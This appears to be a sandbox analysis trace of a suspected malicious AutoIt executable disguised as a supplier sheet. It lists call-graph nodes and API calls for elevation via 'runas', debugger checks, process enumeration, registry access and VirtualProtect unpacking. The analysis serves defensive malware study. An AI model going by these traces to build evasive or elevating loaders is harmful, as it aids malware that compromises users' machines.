105724->104259 105725->104259 105727 d77bfb 105726->105727 105728 d77c3a 105726->105728 105731 d9010a 48 API calls 105727->105731 105729 d7c935 48 API calls 105728->105729 105730 d77c0e 105729->105730 105730->104262 105731->105730 105732->104232 105733->104263 105734->104233 105735->104237 105736->104254 105737->104261 105739 d8f324 48 API calls 105738->105739 105742 d74c60 105739->105742 105740 d74c95 105740->105720 105744 d7c610 MultiByteToWideChar 105740->105744 105741 d74ca0 2 API calls 105741->105742 105742->105740 105742->105741 105766 d74d29 105742->105766 105745 de24df 105744->105745 105746 d7c638 105744->105746 105747 d7c4cd 48 API calls 105745->105747 105748 d9010a 48 API calls 105746->105748 105749 de24e7 105747->105749 105750 d7c64f MultiByteToWideChar 105748->105750 105755 d7a6f8 48 API calls 105749->105755 105751 d7c6b7 105750->105751 105752 d7c66c 105750->105752 105753 d7a2fb 48 API calls 105751->105753 105752->105751 105756 d7c675 105752->105756 105754 d7c6c3 105753->105754 105754->105724 105757 de24f6 105755->105757 105756->105749 105758 d7c686 105756->105758 105759 d9010a 48 API calls 105757->105759 105760 d7c68e _memmove 105758->105760 105762 d9010a 48 API calls 105758->105762 105761 de2518 105759->105761 105760->105724 105762->105760 105763->105718 105764->105718 105765->105725 105767 de45cf 105766->105767 105768 d74d3d 105766->105768 105770 d7a6f8 48 API calls 105767->105770 105775 d74d67 105768->105775 105772 de45da 105770->105772 105771 d74d49 105771->105742 105773 d9010a 48 API calls 105772->105773 105774 de45ef _memmove 105773->105774 105777 d74d7d 105775->105777 105779 d74d78 _memmove 105775->105779 105776 de4703 105777->105776 105778 d9010a 48 API calls 105777->105778 105778->105779 105779->105771 105781 dd23eb _memset 105780->105781 105782 dd2428 105781->105782 105783 dd2452 105781->105783 105784 d7cdb4 48 API calls 105782->105784 105787 d7cdb4 48 API calls 105783->105787 105788 dd2476 105783->105788 105785 dd2433 105784->105785 
105785->105788 105790 d7cdb4 48 API calls 105785->105790 105786 dd24b0 105792 d784a6 81 API calls 105786->105792 105789 dd2448 105787->105789 105788->105786 105791 d7cdb4 48 API calls 105788->105791 105794 d7cdb4 48 API calls 105789->105794 105790->105789 105791->105786 105793 dd24d4 105792->105793 105795 d73bcf 48 API calls 105793->105795 105794->105788 105796 dd24de 105795->105796 105797 dd24e8 105796->105797 105798 dd25a1 105796->105798 105799 d784a6 81 API calls 105797->105799 105800 dd25d3 GetCurrentDirectoryW 105798->105800 105803 d784a6 81 API calls 105798->105803 105801 dd24f9 105799->105801 105802 d9010a 48 API calls 105800->105802 105804 d73bcf 48 API calls 105801->105804 105805 dd25f8 GetCurrentDirectoryW 105802->105805 105806 dd25b8 105803->105806 105807 dd2503 105804->105807 105808 dd2605 105805->105808 105809 d73bcf 48 API calls 105806->105809 105810 d784a6 81 API calls 105807->105810 105814 d7ca8e 48 API calls 105808->105814 105820 dd263e 105808->105820 105811 dd25c2 __NMSG_WRITE 105809->105811 105812 dd2514 105810->105812 105811->105800 105811->105820 105813 d73bcf 48 API calls 105812->105813 105815 dd251e 105813->105815 105816 dd261e 105814->105816 105817 d784a6 81 API calls 105815->105817 105818 d7ca8e 48 API calls 105816->105818 105822 dd252f 105817->105822 105823 dd262e 105818->105823 105819 dd268a 105825 dd274c CreateProcessW 105819->105825 105826 dd26c1 105819->105826 105820->105819 105858 dba17a 8 API calls 105820->105858 105827 d73bcf 48 API calls 105822->105827 105828 d7ca8e 48 API calls 105823->105828 105824 dd2655 105859 dba073 8 API calls 105824->105859 105837 dd276b 105825->105837 105861 dabc90 69 API calls 105826->105861 105831 dd2539 105827->105831 105828->105820 105833 dd256f GetSystemDirectoryW 105831->105833 105836 d784a6 81 API calls 105831->105836 105832 dd2670 105860 dba102 8 API calls 105832->105860 105835 d9010a 48 API calls 105833->105835 105838 dd2594 GetSystemDirectoryW 105835->105838 105839 dd2550 105836->105839 105842 
dd27bd CloseHandle 105837->105842 105843 dd2780 105837->105843 105838->105808 105840 d73bcf 48 API calls 105839->105840 105849 dd255a __NMSG_WRITE 105840->105849 105841 dd26df __NMSG_WRITE 105841->105837 105841->105841 105844 dd27cb 105842->105844 105846 dd27f5 105842->105846 105847 dd2791 GetLastError 105843->105847 105862 db9d09 CloseHandle Mailbox 105844->105862 105845 dd27fb 105850 dd27a5 105845->105850 105846->105845 105855 dd2827 CloseHandle 105846->105855 105847->105850 105849->105808 105849->105833 105863 db9b29 CloseHandle 105850->105863 105855->105850 105856 dd1f2b 105856->104060 105858->105824 105859->105832 105860->105819 105861->105841 105863->105856 105864->104293 105865->104309 105866->104309 105867->104320 105868->104312 105869->104309 105870->104307 105871->104357 105872->104383 105874 d71990 105873->105874 105878 d719af _memmove 105873->105878 105876 d9010a 48 API calls 105874->105876 105875 d9010a 48 API calls 105877 d719c6 105875->105877 105876->105878 105877->104412 105878->105875 105879->104395 105880->104406 105881->104403 105882->104418 105884 d784a6 81 API calls 105883->105884 105885 dcf7db 105884->105885 105900 dcf81d Mailbox 105885->105900 105919 dd0458 105885->105919 105887 dcfa7c 105888 dcfbeb 105887->105888 105892 dcfa86 105887->105892 105965 dd0579 89 API calls Mailbox 105888->105965 105891 dcfbf8 105891->105892 105894 dcfc04 105891->105894 105932 dcf5fb 105892->105932 105893 d784a6 81 API calls 105905 dcf875 Mailbox 105893->105905 105894->105900 105899 dcfaba 105946 d8f92c 105899->105946 105900->104421 105903 dcfaee 105953 d73320 105903->105953 105904 dcfad4 105952 dbd520 86 API calls 4 library calls 105904->105952 105905->105887 105905->105893 105905->105900 105950 dd28d9 48 API calls _memmove 105905->105950 105951 dcfc96 60 API calls 2 library calls 105905->105951 105908 dcfadf GetCurrentProcess TerminateProcess 105908->105903 105909 dcfb05 105911 d814a0 48 API calls 105909->105911 105918 dcfb2f 105909->105918 105910 dcfc56 
105910->105900 105912 dcfb1e 105911->105912 105914 d814a0 48 API calls 105914->105918 105917 d7d89e 50 API calls 105917->105918 105918->105910 105918->105914 105918->105917 105966 dd0300 105 API calls _free 105918->105966 105920 d7b8a7 48 API calls 105919->105920 105921 dd0473 CharLowerBuffW 105920->105921 105922 dc267a 60 API calls 105921->105922 105923 dd0494 105922->105923 105925 d7d3d2 48 API calls 105923->105925 105930 dd04cf Mailbox 105923->105930 105926 dd04ac 105925->105926 105927 d77f40 48 API calls 105926->105927 105928 dd04c3 105927->105928 105929 d7a2fb 48 API calls 105928->105929 105929->105930 105931 dd050b Mailbox 105930->105931 105967 dcfc96 60 API calls 2 library calls 105930->105967 105931->105905 105933 dcf616 105932->105933 105937 dcf66b 105932->105937 105934 d9010a 48 API calls 105933->105934 105936 dcf638 105934->105936 105935 d9010a 48 API calls 105935->105936 105936->105935 105936->105937 105938 dd0719 105937->105938 105939 dd0944 Mailbox 105938->105939 105943 dd073c _strcat _wcscpy __NMSG_WRITE 105938->105943 105939->105899 105940 d7d00b 58 API calls 105940->105943 105941 d7cdb4 48 API calls 105941->105943 105942 d784a6 81 API calls 105942->105943 105943->105939 105943->105940 105943->105941 105943->105942 105944 d945ec 47 API calls __crtLCMapStringA_stat 105943->105944 105968 db8932 50 API calls __NMSG_WRITE 105943->105968 105944->105943 105947 d8f941 105946->105947 105948 d8f9d9 select 105947->105948 105949 d8f9a7 105947->105949 105948->105949 105949->105903 105949->105904 105950->105905 105951->105905 105952->105908 105954 d73334 105953->105954 105956 d73339 Mailbox 105953->105956 105969 d7342c 48 API calls 105954->105969 105961 d73347 105956->105961 105970 d7346e 48 API calls 105956->105970 105958 d9010a 48 API calls 105960 d733d8 105958->105960 105959 d73422 105959->105909 105962 d9010a 48 API calls 105960->105962 105961->105958 105961->105959 105963 d733e3 105962->105963 105963->105909 105965->105891 105966->105918 105967->105931 
105968->105943 105969->105956 105970->105961 105972 de4a7d FindFirstFileW 105971->105972 105973 d8dd89 105971->105973 105974 de4a8e 105972->105974 105975 de4a95 FindClose 105972->105975 105973->104060 105974->105975 105977 dc6b25 GetWindowRect 105976->105977 105978 dc6b42 105976->105978 105979 dc6b5c 105977->105979 105978->105979 105980 dc6b52 ClientToScreen 105978->105980 105979->104428 105979->104431 105980->105979 105981->104434 105982->104438 105984 db7700 105983->105984 105995 db76f9 _wcsncpy 105983->105995 105985 d9010a 48 API calls 105984->105985 105986 db7706 GetFileVersionInfoW 105985->105986 105987 db7722 __NMSG_WRITE 105986->105987 105988 d9010a 48 API calls 105987->105988 105990 db7739 _wcscat _wcscmp _wcscpy _wcsstr 105988->105990 105989 d91bc7 _W_store_winword 59 API calls 105991 db77f7 105989->105991 105993 db7779 755A1560 105990->105993 105994 db7793 _wcscat 105990->105994 105992 db7827 755A1560 105991->105992 105991->105995 105992->105995 105996 db783d _wcscmp 105992->105996 105993->105994 105994->105989 105995->104446 105996->105995 105998 d9234b 80 API calls 2 library calls 105996->105998 105998->105995 106000 d7816b 105999->106000 106001 d780f9 105999->106001 106002 d7a2fb 48 API calls 106000->106002 106001->106000 106003 d78105 106001->106003 106004 d7813a _memmove 106002->106004 106005 d78163 106003->106005 106006 d78110 106003->106006 106004->104490 106023 d77eda 48 API calls 106005->106023 106007 d7a6f8 48 API calls 106006->106007 106009 d7811a 106007->106009 106010 d9010a 48 API calls 106009->106010 106010->106004 106011->104490 106013 d9010a 48 API calls 106012->106013 106014 d7818f 106013->106014 106014->104490 106015->104490 106016->104501 106017->104501 106018->104490 106019->104463 106020->104520 106021->104479 106022->104506 106023->106004 106032 dcae3b 106024->106032 106027 dcad05 Mailbox 106028 dcad31 htons 106027->106028 106029 dcad1b 106027->106029 106028->106029 106029->104528 106031 dbd7f2 106030->106031 106031->104535 106033 
d7a6d4 48 API calls 106032->106033 106034 dcae49 106033->106034 106037 dcae79 WideCharToMultiByte 106034->106037 106036 dcacf3 inet_addr 106036->106027 106038 dcae9d 106037->106038 106039 dcaea7 106037->106039 106040 d8f324 48 API calls 106038->106040 106041 d9010a 48 API calls 106039->106041 106044 dcaea5 106040->106044 106042 dcaeae WideCharToMultiByte 106041->106042 106043 d8f2d0 48 API calls 106042->106043 106043->106044 106044->106036 106046 d7d89e 50 API calls 106045->106046 106047 d71a08 106046->106047 106048 dedb7d 106047->106048 106049 d71a12 106047->106049 106051 d77e53 48 API calls 106048->106051 106050 d784a6 81 API calls 106049->106050 106052 d71a1f 106050->106052 106053 dedb8d 106051->106053 106054 d7c935 48 API calls 106052->106054 106053->106053 106055 d71a2d 106054->106055 106056 d71dce 106055->106056 106057 d71de4 Mailbox 106056->106057 106058 dedb26 106057->106058 106059 d71dfd 106057->106059 106060 dedb2b IsWindow 106058->106060 106063 d71e46 106059->106063 106064 d784a6 81 API calls 106059->106064 106061 dedb3f 106060->106061 106069 d71e51 106060->106069 106124 d7200a 106061->106124 106066 dedb65 IsWindow 106063->106066 106063->106069 106067 d71e17 106064->106067 106066->106061 106066->106069 106071 d71f04 106067->106071 106068 d7197e 48 API calls 106068->106069 106069->104540 106072 d71f1a Mailbox 106071->106072 106073 d7c935 48 API calls 106072->106073 106074 d71f3e 106073->106074 106075 d7c935 48 API calls 106074->106075 106076 d71f49 106075->106076 106077 d77e53 48 API calls 106076->106077 106078 d71f59 106077->106078 106079 d7d3d2 48 API calls 106078->106079 106080 d71f87 106079->106080 106081 d7d3d2 48 API calls 106080->106081 106082 d71f90 106081->106082 106083 d7d3d2 48 API calls 106082->106083 106084 d71f99 106083->106084 106085 de2569 106084->106085 106086 d71fac 106084->106086 106128 dae4ea 60 API calls 3 library calls 106085->106128 106087 de2583 106086->106087 106089 d71fbe GetForegroundWindow 106086->106089 106125 d72016 
106124->106125 106126 d9010a 48 API calls 106125->106126 106127 d72023 106126->106127 106127->106068 106128->106087 106163->104554 106164->104556 106166 d7c4cd 48 API calls 106165->106166 106167 dae2fe 106166->106167 106182 d7193b SendMessageTimeoutW 106167->106182 106169 dae305 106170 dae309 Mailbox 106169->106170 106183 dae390 106169->106183 106170->104570 106172 dae314 106173 d9010a 48 API calls 106172->106173 106174 dae338 SendMessageW 106173->106174 106174->106170 106175 dae34e _strlen 106174->106175 106176 dae35a 106175->106176 106177 dae378 106175->106177 106188 dae0f5 48 API calls 2 library calls 106176->106188 106178 d77e53 48 API calls 106177->106178 106178->106170 106180 dae362 106181 d7c610 50 API calls 106180->106181 106181->106170 106182->106169 106189 d7193b SendMessageTimeoutW 106183->106189 106185 dae39a 106186 dae39e 106185->106186 106187 dae3a2 SendMessageW 106185->106187 106186->106172 106187->106172 106188->106180 106189->106185 106190->104597 106191->104599 106192->104596 106194 d7a9af 106193->106194 106197 d7a9ca 106193->106197 106195 d7b8a7 48 API calls 106194->106195 106196 d7a9b7 CharUpperBuffW 106195->106196 106196->106197 106197->104612 106199 de4c5a 106198->106199 106200 d710f9 106198->106200 106201 d9010a 48 API calls 106200->106201 106203 d71100 106201->106203 106202 d71121 106202->104631 106203->106202 106232 d7113c 48 API calls 106203->106232 106205->104621 106206->104670 106207->104670 106208->104670 106209->104679 106210->104621 106212 d7d2df 106211->106212 106215 d7d30a 106211->106215 106213 d7d2e6 106212->106213 106234 d7d349 53 API calls 106212->106234 106213->106215 106233 d7d349 53 API calls 106213->106233 106215->104635 106215->104636 106217->104672 106218->104661 106219->104661 106220->104668 106221->104672 106222->104648 106223->104672 106224->104672 106225->104672 106226->104670 106227->104670 106228->104670 106229->104672 106230->104667 106231->104672 106232->106202 106233->106215 106234->106213 106235->104689 106236 

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D7376D
                                                                                                                    • Part of subcall function 00D74257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,00000000,00000001,00000000), ref: 00D7428C
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?), ref: 00D7377F
                                                                                                                  • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,00E31120,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00E31124,?,?), ref: 00D737EE
                                                                                                                    • Part of subcall function 00D734F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D7352A
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00D73860
                                                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00E22934,00000010), ref: 00DE21C5
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00DE21FD
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00DE2232
                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E0DAA4), ref: 00DE2290
                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00DE2297
                                                                                                                    • Part of subcall function 00D730A5: GetSysColorBrush.USER32(0000000F), ref: 00D730B0
                                                                                                                    • Part of subcall function 00D730A5: LoadCursorW.USER32(00000000,00007F00), ref: 00D730BF
                                                                                                                    • Part of subcall function 00D730A5: LoadIconW.USER32(00000063), ref: 00D730D5
                                                                                                                    • Part of subcall function 00D730A5: LoadIconW.USER32(000000A4), ref: 00D730E7
                                                                                                                    • Part of subcall function 00D730A5: LoadIconW.USER32(000000A2), ref: 00D730F9
                                                                                                                    • Part of subcall function 00D730A5: RegisterClassExW.USER32(?), ref: 00D73167
                                                                                                                    • Part of subcall function 00D72E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D72ECB
                                                                                                                    • Part of subcall function 00D72E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D72EEC
                                                                                                                    • Part of subcall function 00D72E9D: ShowWindow.USER32(00000000), ref: 00D72F00
                                                                                                                    • Part of subcall function 00D72E9D: ShowWindow.USER32(00000000), ref: 00D72F09
                                                                                                                    • Part of subcall function 00D73598: _memset.LIBCMT ref: 00D735BE
                                                                                                                    • Part of subcall function 00D73598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D73667
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                  • String ID: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"
                                                                                                                  • API String ID: 4253510256-752551368
                                                                                                                  • Opcode ID: 5566c5fe16c31ad1ce2f238e56ab9627547c52262b865869a36d5ba5924667b6
                                                                                                                  • Instruction ID: 57b089fbcac491318dae18e3b59514a5dc9e054ea0030bad52ac53be77cfd699
                                                                                                                  • Opcode Fuzzy Hash: 5566c5fe16c31ad1ce2f238e56ab9627547c52262b865869a36d5ba5924667b6
                                                                                                                  • Instruction Fuzzy Hash: 8951F871644388BECB10ABA19C4ABFD7F79DB55700F04809DF749A2191E7708A45EB73

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DD3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD317F
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00DD321E
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DD32B6
                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00DD34F5
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00DD3502
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1240663315-0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  APIs
                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00D72A33
                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00D72A5D
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D72A80
                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72A8B
                                                                                                                  • CreatePopupMenu.USER32 ref: 00D72A9F
                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00D72AAE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                  • String ID: TaskbarCreated
                                                                                                                  • API String ID: 157504867-2362178303
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00D8E4A7
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00E0DC28,?,?), ref: 00D8E567
                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,00E0DC28,?,?), ref: 00D8E5BC
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D8E5C7
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D8E5DA
                                                                                                                  • GetSystemInfo.KERNEL32(?,00E0DC28,?,?), ref: 00D8E5E4
                                                                                                                  • GetSystemInfo.KERNEL32(?,00E0DC28,?,?), ref: 00D8E5F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2717633055-0
                                                                                                                  APIs
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D73202
                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00D73219
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00DE57D7
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00DE57EC
                                                                                                                  • LockResource.KERNEL32(?), ref: 00DE57FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                  • String ID: SCRIPT
                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00DB6F7D
                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00DB6F8D
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00DB6FAC
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DB6FD0
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6FE3
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00DB7022
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1605983538-0
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00ED21EA
                                                                                                                  • GetProcAddress.KERNEL32(?,00ECBFF9), ref: 00ED2208
                                                                                                                  • ExitProcess.KERNEL32(?,00ECBFF9), ref: 00ED2219
                                                                                                                  • VirtualProtect.KERNEL32(00D70000,00001000,00000004,?,00000000), ref: 00ED2267
                                                                                                                  • VirtualProtect.KERNEL32(00D70000,00001000), ref: 00ED227C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996367037-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00DB78CB
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DBF04D
                                                                                                                  • CoCreateInstance.COMBASE(00DFDA7C,00000000,00000001,00DFD8EC,?), ref: 00DBF066
                                                                                                                  • CoUninitialize.COMBASE ref: 00DBF083
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 2126378814-24824748
                                                                                                                  • Opcode ID: 47ed66035f330e0f75571fac5ebaf844a071211b722e1922b632fe9934af857b
                                                                                                                  • Instruction ID: defdf050727b9dec2d47ec33ec1945aa8ba7a3921b7aedb5d3e9d470c22de09a
                                                                                                                  • Opcode Fuzzy Hash: 47ed66035f330e0f75571fac5ebaf844a071211b722e1922b632fe9934af857b
                                                                                                                  • Instruction Fuzzy Hash: A3A11475604301AFC710DF14C884D6ABBE6FF88324F148998F99A9B3A1DB31ED45CBA1
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNEL32(00D7C848,00D7C848), ref: 00D8DDA2
                                                                                                                  • FindFirstFileW.KERNEL32(00D7C848,?), ref: 00DE4A83
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4185537391-0
                                                                                                                  • Opcode ID: a5f7367f850e68e399309760bc49313fb0153e017f30d9350d5032c83d79484a
                                                                                                                  • Instruction ID: ca6dbc3b7bc74811fe176ffaac95a0dba5c359d132b0fc311a4fcfe3c8bcd04e
                                                                                                                  • Opcode Fuzzy Hash: a5f7367f850e68e399309760bc49313fb0153e017f30d9350d5032c83d79484a
                                                                                                                  • Instruction Fuzzy Hash: EAE0DF32414741AB82147738EC0D8FA379E9B0633CB244715F876C22E0EB70AD50C6FA
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 598e02307bf6d6bc630f5dac5debf375e1658a87d3634b582f6912417fcfc1f7
                                                                                                                  • Instruction ID: ed51f4f1509230a4809c0663b512672ffc3272d472892fac9d1ec4635d078639
                                                                                                                  • Opcode Fuzzy Hash: 598e02307bf6d6bc630f5dac5debf375e1658a87d3634b582f6912417fcfc1f7
                                                                                                                  • Instruction Fuzzy Hash: 24228D70900245DFDB24DF58C491AAAF7F1FF19300F18C169E89AAB391E771A985CBB1
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3964851224-0
                                                                                                                  • Opcode ID: d654381023798d00e145af9658bbcc0b11b29b33f34d7b4c200df2e5b4b3c8b3
                                                                                                                  • Instruction ID: ec3cfefb7a9d80a63f3f7c23616cff54f61fce7f9349a805e627b32da3caaadb
                                                                                                                  • Opcode Fuzzy Hash: d654381023798d00e145af9658bbcc0b11b29b33f34d7b4c200df2e5b4b3c8b3
                                                                                                                  • Instruction Fuzzy Hash: 94925A70608341DFD724EF18C484B6ABBE1FF88704F18895DE98A8B292D775ED45CB62
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: NameUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2645101109-0
